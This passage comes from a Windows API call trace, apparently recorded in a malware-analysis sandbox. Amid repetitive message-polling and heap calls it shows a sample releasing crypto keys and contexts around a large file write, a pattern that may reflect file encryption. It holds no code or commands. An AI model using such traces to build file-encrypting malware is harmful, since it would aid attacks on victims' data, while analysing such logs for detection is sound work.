wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.858] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.858] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.858] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.859] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.859] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.863] WriteFile (in: hFile=0x294, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xd3a0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xd3a0, lpOverlapped=0x0) returned 1 [0089.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.865] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0089.865] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.865] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0089.865] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.865] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.865] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.865] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0089.865] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.865] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0089.865] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0089.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0089.866] CryptDestroyKey (hKey=0x9a4040) returned 1 [0089.866] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.866] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0089.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.866] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0089.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.866] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0089.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.866] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0089.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.866] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.866] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0089.866] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.866] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.867] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0089.867] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.867] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0089.867] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.867] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0089.867] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.867] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0089.867] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.867] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.867] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.867] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.867] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.867] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.867] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.867] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.867] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0089.868] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0089.868] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.868] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.868] FreeLibrary (hLibModule=0x76390000) returned 1 [0089.868] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.868] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.868] CloseHandle (hObject=0x2c4) returned 1 [0089.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.870] CloseHandle (hObject=0x294) returned 1 [0089.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0089.941] TranslateMessage (lpMsg=0x8cf708) returned 0 [0089.942] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0089.942] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0089.947] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0089.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0089.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0089.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0089.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0089.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, 